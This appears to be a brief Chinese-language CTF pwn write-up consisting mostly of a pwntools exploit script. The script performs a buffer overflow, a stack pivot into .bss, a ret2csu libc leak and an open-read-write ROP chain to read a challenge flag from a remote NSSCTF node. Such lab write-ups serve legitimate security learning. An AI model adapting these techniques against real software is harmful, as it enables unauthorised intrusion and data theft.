栈迁移+orw,这里控制好rbp即可
exp如下;
from pwn import * from ctypes import * context(arch = 'amd64', os = 'linux', log_level = 'debug') context.terminal = ['tmux','splitw','-h'] s = lambda content : io.send(content) sl = lambda content : io.sendline(content) sa = lambda content,send : io.sendafter(content, send) sla = lambda content,send : io.sendlineafter(content, send) rc = lambda number : io.recv(number) ru = lambda content : io.recvuntil(content) rcl = lambda : io.recvline() def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m") def debug(cmd = 0): if cmd == 0: gdb.attach(io) else: gdb.attach(io, cmd) def get_address(mode = 0): if mode == 0: return u64(ru('\x7f')[-6:].ljust(8, b'\x00')) elif mode == 1: return u64(rc(6).ljust(8, b'\x00')) elif mode == 2: return int(rc(12), 16) elif mode == 3: return int(rc(16), 16) else : return 0 io = process("./pwn") io = remote("node4.anna.nssctf.cn", 28988) elf = ELF("./pwn") puts_plt = 0x4010b0 puts_got = elf.got['puts'] vuln = 0x401292 bss = 0x404560 ret = 0x40101a rcu_high = 0x401330 rcu_low = 0x40134a leave_ret = 0x40121d payload = b"a"*0x210 + p64(bss) + p64(vuln) sa("it\n", payload) payload2 = p64(ret)*0x4 payload2 += p64(rcu_low) + p64(0) + p64(1) + p64(puts_got) + p64(0)*2 + p64(puts_got) + p64(rcu_high) + p64(0)*2 + p64(0x404860) + p64(0)*4 + p64(vuln) payload2 = (payload2).ljust(0x210, b'\x00') payload2 += p64(0x404360) + p64(leave_ret) s(payload2) libc_base = get_address() - 0x84420 slog("libc_base", libc_base) libc = ELF("./libc.so.6") system = libc_base + libc.sym['system'] binsh = libc_base + next(libc.search(b'/bin/sh')) pop_rdi = 0x401353 pop_rsi = 0x2601f + libc_base pop_rdx = 0x142c92 + libc_base open_addr = libc_base + libc.sym['open'] read_addr = libc_base + libc.sym['read'] write_addr = libc_base + libc.sym['write'] payload3 = b'./flag\x00\x00' + p64(ret)*0x5 payload3 += p64(pop_rdi) + p64(0x404650) + p64(pop_rsi) + p64(0) + p64(open_addr) payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi)+ p64(0x404200) + p64(pop_rdx) + p64(0x30) + p64(read_addr) payload3 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x404200) + p64(pop_rdx) + p64(0x30) + p64(write_addr) payload3 = (payload3).ljust(0x210, b'\x00') payload3 += p64(0x404660) + p64(leave_ret) s(payload3) io.interactive()